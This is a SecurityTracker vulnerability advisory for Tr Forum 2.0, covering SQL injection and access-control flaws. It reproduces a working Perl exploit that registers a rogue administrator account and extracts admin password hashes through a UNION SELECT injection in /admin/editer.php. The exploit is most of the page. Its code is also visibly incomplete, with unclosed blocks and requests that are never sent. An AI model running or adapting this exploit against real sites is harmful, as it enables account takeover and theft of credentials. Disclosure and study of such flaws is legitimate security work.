Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Forum/Board/Portal)  >   Tr Forum Vendors:   Guillaume
Tr Forum Input Validation Flaw in '/admin/editer.php' Lets Remote Users Inject SQL Commands
SecurityTracker Alert ID:  1016788
SecurityTracker URL:
CVE Reference:   CVE-2006-4584, CVE-2006-4585, CVE-2006-4586   (Links to External Site)
Updated:  Jun 8 2008
Original Entry Date:  Sep 5 2006
Impact:   Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  
Version(s): 2.0
Description:   A vulnerability was reported in Tr Forum. A remote user can inject SQL commands.

The '/admin/editer.php' script does not properly validate user-supplied input in the 'id2' parameter. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

This can be exploited to obtain password hashes. Then, the remote user can supply a password hash for an administrator's account to the administrative panel to gain administrative access.

A remote user can access '/membres/modif_profil.php' to modify the profiles of arbitrary users.

A remote user can access 'membres/change_mdp.php' to modify the passwords of arbitrary users.

DarkFig discovered this vulnerability.

A demonstration exploit URL is available at:

Impact:   A remote user can execute SQL commands on the underlying database.

A remote user can modify certain user data on the target system.

Solution:   No solution was available at the time of this entry.
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  Tr Forum V2.0 Multiple Vulnerabilities

# Affected.scr..: Tr Forum V2.0
# Poc.ID........: 10060903
# Type..........: SQL Injection, Bypass Security Restriction
# Risk.level....: Medium
# Vendor.Status.: Unpatched
# Credits.......: DarkFig
# /membres/modif_profil.php => Profil modification (you can choose the id of the member)
# /membres/change_mdp.php   => Password modification ( same... )
# /admin/insert_admin.php   => Second admin (only del post)
# /admin/editer.php         => SQL Injection without quote
# You don't need to crack passwd hashes (for the admin panel)...
# Go to the admin panel (/admin/), enter the username and the hash (not the passwd)... bad security =(
# This exploit is FOR EDUCATIONAL PURPOSE ONLY x 999
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common "POST";
use HTTP::Response;
use Getopt::Long;
use strict;

print STDOUT "\n+", '-' x 53, "+\n";
print STDOUT "|    Tr Forum V2.0 Admin MD5 Passwd Hash Disclosure   |\n";
print STDOUT '+', '-' x 53, "+\n";

my $opt = GetOptions(
   'host=s'   =>  \$host,
   'path=s'   =>  \$path,
   'proxh=s'  =>  \$proxh,
   'proxu=s'  =>  \$proxu,
   'proxp=s'  =>  \$proxp);

if(!$host) {
    print STDOUT "| Usage: ./ --host=[www] --path=[/] [Options]    |\n";
    print STDOUT "| [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd] |\n";
    print STDOUT '+', '-' x 53, "+\n";

if($host  !~ /http/) {$host = 'http://'.$host;}
if($proxh !~ /http/ && $proxh != '') {$proxh = 'http://'.$proxh.'/';}
if(!$path) {$path = '/';}

print STDOUT " [!]Host..: $host\n";
print STDOUT " [!]Path..: $path\n";
print STDOUT " [~]Admin user...\n";

my $cc = HTTP::Cookies->new();
my $ua = LWP::UserAgent->new();
   $ua->proxy(['http'] => $proxh) if $proxh;

my $re = POST $host.$path.'/admin/insert_admin.php',[
         'login'    => 'AcidSploitWasHere',
         'password' => 'psychopasswd',
         'mail'     => '',
   $re->proxy_authorization_basic($proxu, $proxp) if $proxp;

print STDOUT " [+]User..: AcidSploitWasHere\n";
print STDOUT " [+]Pass..: psychopasswd\n";
print STDOUT " [!]Rights: 2 (medium)\n";
print STDOUT " [~]Collecting admin's hash/username...\n";

my $re = POST $host.$path.'index.php',[
         'login'   => 'AcidSploitWasHere',
         'pwd'     => 'psychopasswd',

my $re = $ua->get($host.$path.'admin/editer.php?id2=-1 UNION SELECT pass,pseudo,0 FROM tr_user_forum');

if($re->content =~ /">([a-z0-9]{32})<\/font>/) {
                print STDOUT "\n ".$1.'::';}

if($re->content =~ /;">(.*?)<\/textarea>/) {
                print STDOUT $1.' (root)';}

print STDOUT "\n+", '-' x 53, "+\n";


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, LLC